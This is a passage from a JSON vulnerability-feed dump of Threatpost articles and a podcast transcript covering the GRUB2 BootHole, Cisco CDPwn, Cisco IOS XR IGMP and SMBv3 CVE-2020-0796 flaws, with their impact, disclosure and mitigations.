"cvelist": ["CVE-2019-18935", "CVE-2020-5135"], "modified": "2020-05-07T21:01:37", "id": "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", "href": "https://threatpost.com/blue-mockingbird-monero-mining/155581/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:24:20", "description": "Billions of Windows and Linux devices are vulnerable to cyberattacks stemming from a bug in the GRUB2 bootloader, researchers are warning.\n\nGRUB2 (which stands for the GRand Unified Bootloader version 2) is the default bootloader for the majority of computing systems. Its job is to manage part of the start-up process \u2013 it either presents a menu and awaits user input, or automatically transfers control to an operating system kernel.\n\nSecure Boot is an industry standard that ensures that a device boots using only trusted software. When a computer starts, the firmware checks the signatures of UEFI firmware drivers, EFI applications and the operating system. If the signatures are valid, the computer boots, and the firmware gives control to the operating system. According to Eclypsium researchers, the bug tracked as CVE-2020-10713 could allow attackers to get around these protections and execute arbitrary code during the boot-up process, even when Secure Boot is enabled and properly performing signature verification.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nDubbed BootHole by Eclypsium because it opens up a hole in the boot process, the new bug is a buffer overflow vulnerability in the way that GRUB2 parses content from the GRUB2 config file (grub.cfg), according to Eclypsium.\n\n\u201cThe GRUB2 config file is a text file and typically is not signed like other files and executables,\u201d researchers wrote in the [firm\u2019s analysis](<https://eclypsium.com/2020/07/29/theres-a-hole-in-the-boot/>), released on Wednesday. As a result, Secure Boot doesn\u2019t check it. Thus, an attacker could modify the contents of the GRUB2 configuration file to include attack code. And further, that file is loaded before the operating system is loaded, so the attack code runs first.\n\n\u201cIn this way, attackers gain persistence on the device,\u201d explained researchers.\n\nOn the technical front, Red Hat noted that the grub.cfg file is composed of several string tokens.\n\n\u201cThe configuration file is loaded and parsed at GRUB initialization right after the initial boot loader, called shim, has loaded it,\u201d the project said in [an advisory](<https://access.redhat.com/security/vulnerabilities/grub2bootloader>) issued on Wednesday. \u201cDuring the parser stage, the configuration values are copied to internal buffers stored in memory. Configuration tokens that are longer in length than the internal buffer size end up leading to a buffer overflow issue. An attacker may leverage this flaw to execute arbitrary code, further hijacking the machine\u2019s boot process and bypassing Secure Boot protection. Consequently, it is possible for unsigned binary code to be loaded, further jeopardizing the integrity of the system.\u201d\n\nOnce in, attackers have \u201cnear total control\u201d over a target machine: \u201cOrganizations should be monitoring their systems for threats and ransomware that use vulnerable bootloaders to infect or damage systems,\u201d according to the analysis.\n\nThe bug carries a high-severity CVSS rating of 8.2 (Red Hat deems it \u201cmoderate\u201d in severity, and Microsoft [characterizes it as \u201cimportant\u201d](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200011>)). BootHole likely avoided a critical rating because in order to exploit it, an attacker would need to first gain administrative privileges.\n\n\u201cAn attacker would first need to establish access to the system such as gaining physical access, obtain the ability to alter a pxe-boot network, or have remote access to a networked system with root access,\u201d according to Red Hat.\n\nThe bad news is that GRUB2 is nearly ubiquitous across the computing landscape.\n\n\u201cThe vulnerability is in the GRUB2 bootloader utilized by most Linux systems,\u201d the researchers said. \u201cThe problem also extends to any Windows device that uses Secure Boot with the standard Microsoft Third Party UEFI Certificate Authority.\u201d\n\nThey added that the majority of computers (laptops, desktops, servers and workstations) are vulnerable, and that the vulnerability also affects network appliances, proprietary gear specific to healthcare, financial and other verticals, internet-of-things (IoT) devices, and operational technology (OT) and SCADA equipment in industrial environments. In all, billions of devices are susceptible.\n\nWorse, no simple patch or firmware update can fix the issue, according to Eclypsium.\n\n\u201cMitigation is complex and can be risky and will require the specific vulnerable program to be signed and deployed, and vulnerable programs should be revoked to prevent adversaries from using older, vulnerable versions in an attack,\u201d the researchers said. \u201cThe three-stage mitigation process will likely take years for organizations to complete patching.\u201d\n\nOn the supplier side, the fix will require the release of new installers and bootloaders for all versions of Linux, as well as new versions of vendors\u2019 \u201cshims\u201d (the aforementioned first-stage boot loaders) to be signed by the Microsoft Third-Party UEFI certificate authority, Eclypsium warned. Also, hardware-makers that provision their own keys into their hardware at the factory level (which sign GRUB2 directly) will need to provide updates, and revoke their own vulnerable versions of GRUB2.\n\n\u201cIt is important to note that until all affected versions are added to the [Secure Boot revocation list, a.k.a. dbx], an attacker would be able to use a vulnerable version of shim and GRUB2 to attack the system,\u201d researchers explained. \u201cThis means that every device that trusts the Microsoft 3rd Party UEFI CA will be vulnerable for that period of time.\u201d\n\nEclypsium has coordinated responsible disclosure of BootHole with a raft of affected vendors and Linux distros, including Microsoft, the UEFI Security Response Team (USRT), Oracle, Red Hat (Fedora and RHEL), Canonical (Ubuntu), SuSE (SLES and openSUSE), Debian, Citrix, VMware, and various OEMs and software vendors, several of which have issued [their own advisories](<https://www.debian.org/security/2020-GRUB-UEFI-SecureBoot/>).\n\nMicrosoft will be releasing a set of signed dbx updates, which can be applied to systems to block shims that can be used to load the vulnerable versions of GRUB2, according to Eclypsium.\n\n\u201cDue to the risk of bricking systems or otherwise breaking operational or recovery workflows, these dbx updates will initially be made available for interested parties to manually apply to their systems rather than pushing the revocation entries and applying them automatically,\u201d the firm noted. \u201cOrganizations should additionally ensure they have appropriate capabilities for monitoring UEFI bootloaders and firmware and verifying UEFI configurations, including revocation lists, in their systems.\u201d\n\nOrganizations should also test device-recovery capabilities, including the \u201creset to factory defaults\u201d functionality, so they can recover it if a device is negatively impacted by an update.\n\n**_Complimentary Threatpost Webinar_**_: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c_**_[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)_**_\u201d brings top cloud-security experts together to explore how _**_Confidential Computing_**_ is a game changer for securing dynamic cloud data and preventing IP exposure. Join us _**_[Wednesday Aug. 12 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) _**_for this_**_ FREE _**_live webinar._\n\n_ _\n", "cvss3": {}, "published": "2020-07-29T19:53:23", "type": "threatpost", "title": "Billions of Devices Impacted by Secure Boot Bypass", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10713", "CVE-2020-5135"], "modified": "2020-07-29T19:53:23", "id": "THREATPOST:D2BB5A9DDB021A7E256A4E0D8A6BDA55", "href": "https://threatpost.com/billions-of-devices-impacted-secure-boot-bypass/157843/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:31:47", "description": "Researchers on Wednesday disclosed five critical vulnerabilities in Cisco Discovery Protocol (CDP), the Cisco Proprietary Layer 2 network protocol that is used to discover information about locally attached Cisco equipment.\n\nResearchers say that the vulnerabilities, which they collectively call CDPwn, can allow attackers to remotely take over millions of devices. The flaws specifically exist in the parsing of CDP packets, in the protocol implementation for various Cisco products, from its software to IP cameras. Cisco issued patches on Wednesday addressing the five flaws, and is urging users to update as soon as possible.\n\nThreatpost talked to Ben Seri, VP of Research at Armis, who discovered the flaws, about the CDPwn flaws, their impact, and why Layer 2 protocols are an under-researched area.\n\n**[Listen to the full podcast below, or download direct here](<http://traffic.libsyn.com/digitalunderground/cisco_flaw_podcast.mp3>).**\n\n[\n\n](<http://iframe%20style=border:%20none%20src=//html5-player.libsyn.com/embed/episode/id/13028780/height/360/theme/legacy/thumbnail/yes/direction/backward/%20height=360%20width=100%%20scrolling=no%20%20allowfullscreen%20webkitallowfullscreen%20mozallowfullscreen%20oallowfullscreen%20msallowfullscreen/iframe>)\n\n_Below is a lightly-edited transcript of the podcast._\n\n**Lindsey O\u2019Donnell-Welch**: Hi, everyone, welcome back to the Threatpost podcast. You\u2019ve got Lindsey O\u2019Donnell-Welch with Threatpost here. And I\u2019m joined today by Ben Seri, the VP of research at Armis, to discuss some newly disclosed vulnerabilities that have been found in Cisco equipment. So Ben, thank you so much for joining.\n\n**Ben Seri: **Thank you.\n\n**LO: **So Armis discovered five vulnerabilities that were disclosed today. And those are stemming from the Cisco Discovery Protocol, aka CDP, which is the info sharing layer that maps all Cisco equipment on a network. And you guys collectively called these flaws CDPwn. So just to start, tell us some more deep in depth about what is the Cisco Discovery Protocol, just for some context here.\n\n**BS:** Sure. Yes, so Cisco makes network appliances. And so from time to time, they invent these protocols that are then used by every product that they produce. And CDP is one of these protocols. It\u2019s a Discovery Protocol, as you mentioned, it\u2019s simply a way for Cisco devices to find one another in a network. It\u2019s a protocol that works simply with multicast [frames], or what is called broadcast, packets that are sent in the clear, inside the network. And every device, Cisco device, sends packets from time to time saying, \u2018Hi, my IP address is this, My name is this, my operating system is this\u2019 and all kinds of information and they collect the Cisco devices\u2019 information about one another, about their neighbors. And then when you have all kinds of Cisco management products, you\u2019re able to view all the Cisco devices in your network. So it\u2019s mainly about convenience. There are not many functional features other than convenience related that use CDP. But it\u2019s nevertheless enabled by default on all of Cisco products, in some of their products you can\u2019t actually turn it off. It\u2019s something that just remains on all the time. And like any protocol it introduces an attack surface that might contain vulnerabilities, like the ones that we found in this occasion.\n\n**LO:** Right. And that\u2019s really interesting that this can\u2019t be turned off as a function in certain devices. And I know that in your research, you mentioned this is something that\u2019s implemented in virtually all Cisco products from switches to routers to IP phones and IP cameras. So can you speak a little bit about the threat attack surface here and the level of devices that could be impacted by this?\n\n**BS:** Yeah so CDP, one of its interesting aspects is that it\u2019s a layer 2 protocol. It\u2019s something that is just very low in the stack, very basic in how the network, the packets are built from this protocol, and it\u2019s actually a layer where researchers don\u2019t look at too much. Most of the vulnerabilities are either in application layer, in rare cases they are the transportation layer, transport layer; and then, what is called the data link layer, or the layer 2, is where you have dozens of protocols, used by network appliances, switches and routers. And these are kind of an attack surface that is not enough researched.\n\nCisco Discovery Protocol is one of these and the vulnerabilities themselves are critical. When we found them, they were not known to Cisco or any other individual as far as we know. And we\u2019ve worked with Cisco on the patch mitigation process. And so when we are announcing this today, customers of Cisco are advised to go ahead and install the patches as quickly as possible.\n\nAnd so you asked about the wide array of devices impacted by this and that\u2019s true; you find this in the Cisco switches and routers; IP phones from Cisco; and these are devices that have a complete hold on the market in these fields. When you look at IP phones, for example, Cisco advertises that over 95 percent of Fortune 500 companies use Cisco communication solutions. So that these are the Cisco IP phones, for example, and you would find them in government offices and you\u2019d find them in the White House, and in the Situation Room, but also throughout corporate and trade floors and whatever. They\u2019re really prevalent devices.\n\nThat\u2019s the IP phone but Cisco network equipment, the switches and the routers, are very, very popular as well and the impact is severe in terms of what kind of attacks attackers can actually pull off using these vulnerabilities.\n\n**LO: **And I want to talk about that in a second. But I just wanted to ask you real quick, you mentioned before that CDP, there hasn\u2019t been a whole lot of research around it. I wanted to ask, you how you first came across these vulnerabilities and what caused you to look further into CDP as a potential threat surface for vulnerabilities. Because as you said, it usually is kind of the application layers and some other areas that vulnerabilities are discovered in, so how did you first come across these flaws?\n\n**BS:** Yeah so actually, what piqued our interest for looking into this was a Cisco security advisory published around two years ago, that detailed some vulnerabilities that they found in LDP, which is another Discovery Protocol \u2013 not CDP protocol \u2013 but another Discovery Protocol, pretty similar to CDP. And this advisory mentioned that Cisco found some bugs that could lead to denial of service in a wider array of devices. And although this wasn\u2019t what is called RCE vulnerability, or remote code execution, what they discovered was some sort of buffer overflow. And we felt that if they internally found something that actually parses these packets, the LDP packets, in a way that can lead to vulnerabilities, then we might find similar stuff that can lead to critical vulnerabilities.\n\nAnd really the reason that we looked at it, other than this initial lead we had through Cisco\u2019s advisory, was the understanding that an attacker that has a vulnerability in these types of protocols has the ability to break network segmentation. Part of what we do is to try understand the havoc that IoT devices might have on networks. And network segmentation is actually a very basic design tool for networks to prevent certain devices, such as IoT devices, from crossing the bounds over from the IoT segment into corporate segments. And in CDP and LDP, and these discovery protocols, layer 2 protocols, they\u2019re actually parsed by the network of clients, regardless of the segment, regardless of if the device connected to it is an IoT segment, or in the corporate segment. So yeah, the understanding here was \u201cokay, this is interesting,\u201d Cisco found something in LDP, this would mean an IoT device could attack the switch even if it\u2019s segmented, then having access to this switch, it can move over to other segments. So that was our motivation to try and understand if this attack surface might contain vulnerabilities, like the ones eventually that we found.\n\n**LO: **Right. And that was for me a huge highlight from the research was that because the network infrastructure itself was at risk and exploitable that network segmentation, which is usually a big security strategy is at risk now. So I thought that was a big implication here.\n\nI wanted to focus in on the five vulnerabilities that are kind of at the heart of this and there were four remote code execution flaws and then one denial of service flaw. So can you talk a little bit more about these vulnerabilities and what an attacker would need to exploit them, how difficult they are to exploit and if there is one vulnerability that\u2019s particularly severe or easier than the others to exploit.\n\n**BS:** So unfortunately, the vulnerabilities themselves are not that complicated. There are standard buffer overflows that you would find, bugs you will find from time to time, and exploiting them takes some effort, but actually, it\u2019s not that difficult. There are some mitigations in these devices to make it harder for attackers to actually exploit the vulnerabilities but they are not that difficult to bypass. So there are the four RCEs, the denial of service one is also something with a few CDP packets maliciously crafted, an attacker can take down switches and routers, and completely stop their functionality. And the RCE ones are just a matter of sending a couple of packets to the affected devices in order to gain code execution on your devices.\n\nI would say that the most severe of these four is the one that affects IP phones, they have an additional bug other than the memory corruption part. They parse broadcast CDP packets and unicast CDP packets as if they were regular standard CDP packets, which are normally very specific multicast packets. And that means for attackers that you don\u2019t need to find the IP phone that you want to target inside the network, you can simply send a broadcast packet, that will go out to the entire network. And the IP phones that are affected by this will parse these packets that will otherwise be regarded as invalid packets. They would parse them nonetheless and the vulnerability will be triggered on them almost simultaneously throughout the networks. The attacker can sent one broadcast packet, it will either cause denial of service or code execution, depending on the exploit. And then you will have an army of IP phones into the network that you can either eavesdrop on the calls, carry out additional attacks from, steal sensitive data.\n\nIP phones are really the most enterprise grade type of IoT device that you would have a network, Cisco is an enterprise-oriented company. But nevertheless, they might be vulnerable. And they do contain confidential data and they might also be used as a way to have a hold inside the network, to carry out further attacks from them. And the most interesting part is that they are really, really prevalent.\n\n**LO:** And just to clarify for our listeners, that vulnerability is, I believe it was tied to CVE-2020-3111. So that\u2019s the one that specifically impacts the Cisco IP phones and is a RCE and denial of service flaw, but I could definitely see that one being severe. So can you walk us through the potential impact of these vulnerabilities if exploited? I know there\u2019s kind of a lot to unwind there you talked earlier about the issues that it could cause a network segmentation, but then also, there were issues around data exfiltration attacks and some other attacks. So can you walk us through that?\n\n**BS:** Yeah, so the first point for an attacker to take advantage of the vulnerability is to have some foothold inside the network. So it\u2019s not an attack that necessarily is coming from the internet. The attacker needs to have some access, but if you have some very low grade IoT device sitting inside the network, part of your threat model already is that these devices might be compromised. But really what protects today what is used to protect you from these devices running havoc on your network is network segmentation. So the the threat is that once the compromised IoT device tries to exploit CDPwn, it can target the switch that it is connected to, and then the switch from there all kinds of attacks can be carried on. It\u2019s a very good position for an attacker to be on. It allows him to capture traffic that traverses through the switch. If it\u2019s plaintext traffic that might include confidential data, anything that\u2019s of value for the attacker. It\u2019s also a point where an attacker can carry out man-in-the-middle attacks if the device inside the network is going out to the internet to a specific service, or internally through the service inside the network. The attacker can change the traffic that traverses through the switch in a way that the man-in-the-middle attack might be beneficial for him, it can be used to send send malware inside specific JavaScript code that is rendered in the browser or anything of that sort. There are a multitude of attacks that are very efficient once you have a man-in-the-middle position inside the network.\n\nBut then, you can also move laterally, the segmentation that previously limited these attacks only to the IoT segment, now are no longer in place. Inside the switch, you can go to any segments that you\u2019d like. Or it can completely put all the devices in one segment and they can now also talk to one another, although originally they were on separate segments. Last, there is also the impact to IP phones and IP cameras. And like I mentioned the for example, on the IP phones, they are vulnerable to the broadcast attack as well, so from the switch, you can also send the broadcast CDP packet that will trigger that the vulnerabilities on the IP phones and that would be the next step getting access to these corporate assets that might contain confidential data. And all from a very strong position inside the network, the core space, or any other switch inside the network that is not regularly examined, you don\u2019t expect these types of devices to be compromised. And for that reason, they\u2019re not monitored and not tracked as much as your corporate assets.\n\n**LO: **Right. And I mean, speaking of corporate assets, you know, like you mentioned before, many times, you know, a lot of these devices are used primarily by enterprises. And that kind of heightens these types of attacks and their severity, like man-in-the-middle, like data exfiltration, and kind of what that means for enterprise organizations that might be open to these types of threats. What can enterprise organizations do to secure against this type of attack?\n\n**BS: **Monitoring these types of devices, treating them as endpoints that might be compromised as well, not only the Windows devices and the mobile devices We are aware of that consumer grade IoT, whether it\u2019s an Amazon Echo, or if some tablet of sort or anything of that nature, we see these devices as IoT, and we have learned that these might be compromised. And there is a growing consensus that securing these types of devices is needed. But when you try to define IoT, it really has no bounds; any device, any embedded device that does not have an end security agent on it, in some ways, it\u2019s an IoT device. So for every organization, it looks like a benign device, the pipeline of the network, something of that sort, it can also be vulnerable, attackers can attack it as well. And having attacked it they can use it as a foothold inside the network \nto carry out additional attacks.\n\nSo, in the VoIP phones and enterprise grade IP cameras from Cisco, these are also at the end of the day computers that parse packets might be vulnerable to attacks and can be used for further attacks. I think the solution is always to find a product that monitors all types of these unmanaged devices in a way that can detect if something wrong has occurred, if something out of normal behavior has occurred. But also obviously, whenever a vulnerability is published, quickly patch, that\u2019s the best way to stay secure.\n\n**LO:** Right. And I know you spoke a little bit about IoT security. And it seems like that is also kind of a big part of this research and how IoT security issues and connected device issues, the impact that they can have on corporate networks. Because when you think about it, a lot of businesses have all kinds of devices that have popped up over the years that are connected, that they don\u2019t even necessarily think of, like surveillance cameras, etc, etc. So that\u2019s that\u2019s a really good point as well. And I finally I wanted to ask you about the process of disclosure with Cisco and the patches that have been deployed at this point, what was the process of disclosure in terms of the time frame and the patches that are available now?\n\n**BS:** It was rather a long process. But part of that was how this disclosure went about. So at the end of August, we first disclosed the vulnerabilities; at the time we found them on the Nexus switches and IRS6R routers. And Cisco was very good to work with and they developed patches quickly. But then, during the disclosure, we actually found that the similar vulnerabilities exist in IP phones and cameras. And for that reason that the disclosure process went a bit longer, way over 100 days. And yes, patches have been deployed by Cisco, some of the upgrades to these devices have already been put out by Cisco. But today, they are also having their security advisories that mention what versions are patched and the different patches, the affected devices are being released today as well.\n\n**LO:** Is there any other takeaways from your research into CDPwn, or the vulnerabilities or implications here that you want to mention from your perspective, Ben?\n\n**BS:** Um, yeah, I think that when we look at network, when we look at all of the variety of devices that we have, any of the devices that are unmanaged, we need to look at them in the same way, they\u2019re not different. All of them are computers that might open to attack. That\u2019s one hand and the other end of it is the attack surface. There are just endless types of layer 2 protocols and CDP is one of them. But there is actually a very large attack surface there that has been neglected. But I think the research community needs to do more in looking at these protocols. And network segmentation, at the end of the day, is a strong solution for IoT, and other security problems are solved by it, but we need to make sure that it really stands strong against all kinds of attacks. CDPwn is just one of them. So looking at these protocols, understanding whether they present a risk to network appliances, is essential for that process to be as strong as it can be.\n\n**LO:** Absolutely. Well, Ben, thank you so much for coming onto the Threatpost podcast today to talk about these newly disclosed vulnerabilities in Cisco equipment.\n\n**BS:** Thank you for having me.\n\n**LO:** And once again, this is Lindsay O\u2019Donnell-Welch with Threatpost here talking today with Ben Seri, VP of research at Armis. Catch us next week on the Threatpost podcast.\n\n_**Also, check out our [podcast microsite](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>), where we go beyond the headlines on the latest news.**_\n", "cvss3": {}, "published": "2020-02-05T16:00:56", "type": "threatpost", "title": "Critical Cisco 'CDPwn' Protocol Flaws Explained: Podcast", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3111", "CVE-2020-5135"], "modified": "2020-02-05T16:00:56", "id": "THREATPOST:8DA5404E0E8179BD2E87B8F221395859", "href": "https://threatpost.com/behind-cdpwn-discovering-critical-cisco-protocol-flaws/152530/", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:20:38", "description": "Cisco Systems says hackers are actively exploiting previously unpatched vulnerabilities in its carrier-grade routers that could allow adversaries to crash or severely disrupt devices.\n\nThe vulnerabilities exist in the Distance Vector Multicast Routing Protocol (DVMRP) feature of Cisco IOS XR Software and could allow an unauthenticated, remote attacker to immediately crash the Internet Group Management Protocol (IGMP) process, the company warned [in an advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-dvmrp-memexh-dSmpdvfz>) over the weekend.\n\nThe flaw, tracked as [CVE-2020-3566](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-dvmrp-memexh-dSmpdvfz>), also allows attackers to make devices consume available memory and eventually crash, something that can \u201cnegatively impact other processes that are running on the device,\u201d the company warned. \n[](<https://threatpost.com/newsletter-sign/>) \nIOS XR Software runs many of Cisco\u2019s carrier-grade network routers, including the [CRS](<https://en.wikipedia.org/wiki/Carrier_Routing_System>) series, [12000](<https://en.wikipedia.org/wiki/Cisco_12000>) series, and [ASR9000](<https://en.wikipedia.org/wiki/ASR9000>) series. The vulnerabilities affect \u201cany Cisco device that is running any release of Cisco IOS XR Software if an active interface is configured under multicast routing and it is receiving DVMRP traffic,\u201d the company said.\n\nThe cause of the flaws is the incorrect management of how IGMP packets, which help maintain the efficiency of network traffic, are queued, the company said.\n\n\u201cAn attacker could exploit these vulnerabilities by sending crafted IGMP traffic to an affected device,\u201d according to the advisory. \u201cA successful exploit could allow the attacker to immediately crash the IGMP process or cause memory exhaustion, resulting in other processes becoming unstable. These processes may include, but are not limited to, interior and exterior routing protocols.\u201d\n\nCisco is currently working on software updates to address the vulnerabilities, which have no workaround, the company said. However, companies using the affected routers can mitigate attacks depending on their needs and network configuration, according to Cisco.\n\nIn the case of a memory exhaustion, Cisco recommends that customers implement a rate limiter, which will require that customers understand their current rate of IGMP traffic and set a rate lower than the current average rate.\n\n\u201cThis command will not remove the exploit vector,\u201d the company acknowledged. \u201cHowever, the command will reduce the traffic rate and increase the time necessary for successful exploitation. The customer can use this time to perform recovery actions.\u201d\n\nIt is possible to recover the memory consumed by the IGMP process by restarting the IGMP process, according to Cisco, which provided details for how to do so.\n\nTo mitigate both memory exhaustion and the immediate IGMP process crash, Cisco advised that customers implement an access control entry (ACE) to an existing interface access control list (ACL). Alternatively, the customer can create a new ACL for a specific interface that denies DVMRP traffic inbound on that interface, the company said.\n\nIf an attacker does successfully crash a router\u2019s IGMP process, operators do not need to manually restart the IGMP process because the system will perform that action, which will recover the consumed memory, according to Cisco.\n\nIn addition to mitigations, the company also provided details in the advisory for how network operators will know if a router has been compromised and other details for dealing with any attack on the vulnerabilities until a fix can be found.\n\n**[On Wed Sept. 16 @ 2 PM ET:](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) Learn the secrets to running a successful Bug Bounty Program. [Register today](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) for this FREE Threatpost webinar \u201c[Five Essentials for Running a Successful Bug Bounty Program](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this [LIVE](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) webinar.**\n", "cvss3": {}, "published": "2020-09-02T12:28:15", "type": "threatpost", "title": "Cisco Warns of Active Exploitation of Flaw in Carrier-Grade Routers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3566", "CVE-2020-5135"], "modified": "2020-09-02T12:28:15", "id": "THREATPOST:A5D4FD6C2281AE395B821A8D0EB5736D", "href": "https://threatpost.com/cisco-warns-of-active-exploitation-of-flaw-in-carrier-grade-routers/158887/", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-10-14T22:27:36", "description": "UPDATE\n\nMicrosoft released an emergency out-of-band patch to fix a SMBv3 wormable bug on Thursday that leaked earlier this week. The a patch for the vulnerability, tracked as CVE-2020-0796, is now rolling out to Windows 10 and Windows Server 2019 systems worldwide, according to Microsoft.\n\nOn Wednesday Microsoft warned of a wormable, unpatched remote code-execution vulnerability in the Microsoft Server Message Block protocol \u2013 the same protocol that was targeted by the infamous WannaCry ransomware in 2017. Microsoft released its fix, [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>), the following day as an update for Windows 10 (versions 1903 and 1909) and Windows Server 2019 (versions 1903 and 1909).\n\nThe critical bug affects Windows 10 and Windows Server 2019, and was not included in Microsoft\u2019s [Patch Tuesday release](<https://threatpost.com/microsoft-patches-bugs-march-update/153597/>) this week.\n\nThe bug can be found in version 3.1.1 of Microsoft\u2019s SMB file-sharing system. SMB allows multiple clients to access shared folders and can provide a rich playground for malware when it comes to lateral movement and client-to-client infection. This was played out in version 1 of SMB back in 2017, when the [WannaCry ransomware](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) used the NSA-developed [EternalBlue SMB exploit](<https://threatpost.com/scanner-shows-eternalblue-vulnerability-unpatched-on-thousands-of-machines/126818/>) to self-propagate rapidly around the world.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn this case, \u201cto exploit the vulnerability against an SMB server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server,\u201d Microsoft explained [in its advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200005#ID0EN>), issued Wednesday. \u201cTo exploit the vulnerability against an SMB client, an unauthenticated attacker would need to configure a malicious SMBv3 server and convince a user to connect to it.\u201d\n\nMicrosoft issued its advisory only after details of the bug were published online by Cisco Talos and Fortinet. The firms\u2019 disclosure was an apparent miscommunication with Microsoft \u2013 both posts have since been taken down.\n\nAccording to [Duo Security](<https://duo.com/decipher/microsoft-advisory-warns-of-smbv3-flaw>), Fortinet had described the issue as a \u201cBuffer Overflow Vulnerability in Microsoft SMB Servers\u201d and said it could be used to execute arbitrary code within the context of the application. Cisco Talos meanwhile warned that a \u201cwormable\u201d attack would be able to exploit the vulnerability to \u201cmove from victim to victim.\u201d\n\nThreatpost reached out to both firms for additional details. Cisco Talos told Threatpost, \u201cOn March 10, information on an in-process effort was inadvertently posted and then promptly deleted from the Talos blog because it was not finalized. As a matter of policy, we do not discuss research that has not yet been approved for public disclosure. We are aware that this may have caused some confusion and will follow up when we have more to offer.\u201d\n\nWhile the bug is dangerous, researchers said this bug likely won\u2019t lead to \u201cWannaCry 2.0.\u201d\n\n\u201cConsidering that SMBv3 is not as widely used as SMBv1, the potential immediate impact of this threat is most likely lower than past vulnerabilities,\u201d Richard Melick, senior technical product manager at Automox, told Threatpost. \u201cBut that does not mean organizations should be disregarding any endpoint hardening that can happen now while Microsoft works on a patch\u2026it\u2019s better to respond today and disable SMBv3 and block TCP port 445. Respond now and vulnerabilities end today.\u201d\n\nJake Williams, founder of security firm Rendition Security, [said on Twitter](<https://twitter.com/MalwareJake/status/1237512617817751552>) that the risk of exploitation is mitigated by kernel protections \u2013 specifically kernel address space layout randomization (KASLR). KASLR randomly arranges the address space positions of key data areas of a given process. It essentially means that an attacker can\u2019t establish one attack path and use it over and over again.\n\n\u201cCore SMB sits in kernel space and KASLR is great at mitigating exploitation,\u201d tweeted Williams. \u201cAssuming this is kernel space, any unsuccessful exploitation results in [the blue screen of death] BSOD.\u201d He added, \u201cEven with trigger code, you still have to remotely bypass KASLR (not an easy task). If you need proof, [look at BUCKEYE](<https://symantec-blogs.broadcom.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit>). They had the EternalBlue trigger, but had to chain it with another information disclosure vulnerability to gain code execution. This isn\u2019t easy.\u201d\n\nSo far, there\u2019s no evidence that the vulnerability had been exploited in the wild, Microsoft said in the advisory. However, Melick said to proceed with caution.\n\n\u201cThere are still too many unknowns to say how effective this wormable vulnerability could be; is it going to be as easy as EternalBlue to implement or will it have the same difficulties as BlueKeep?\u201d Melick noted \u2013 the latter in reference to the [wormable bug](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) disclosed last year that some feared would lead to another WannaCry-level event. Exploits for BlueKeep however have so far [fallen well short](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) of researchers\u2019 initial fears.\n\nIn lieu of a patch, Microsoft on Wednesday noted that administrators can use PowerShell to disable SMBv3 compression, which will block unauthenticated attackers from exploiting the vulnerability against an SMBv3 server.\n\nTo protect clients from outside attacks, it\u2019s necessary to block TCP port 445 at the enterprise perimeter firewall.\n\n\u201cTCP port 445 is used to initiate a connection with the affected component,\u201d Microsoft noted. \u201cBlocking this port at the network perimeter firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. This can help protect networks from attacks that originate outside the enterprise perimeter. Blocking the affected ports at the enterprise perimeter is the best defense to help avoid internet-based attacks.\u201d\n\nHowever, systems could still be vulnerable to attacks from within the enterprise perimeter \u2013 so once attackers penetrate the corporate network, they could use an exploit to move around in an unfettered way. Microsoft has published [general guidelines](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>) to prevent lateral connections.\n\n**_Interested in security for the Internet of Things and how 5G will change things? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n\n_(This article was updated March 12 with the news that Microsoft has released a patch for CVE-2020-0796)_\n", "cvss3": {}, "published": "2020-03-11T17:13:53", "type": "threatpost", "title": "Wormable, Unpatched Microsoft Bug Threatens Corporate LANs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796", 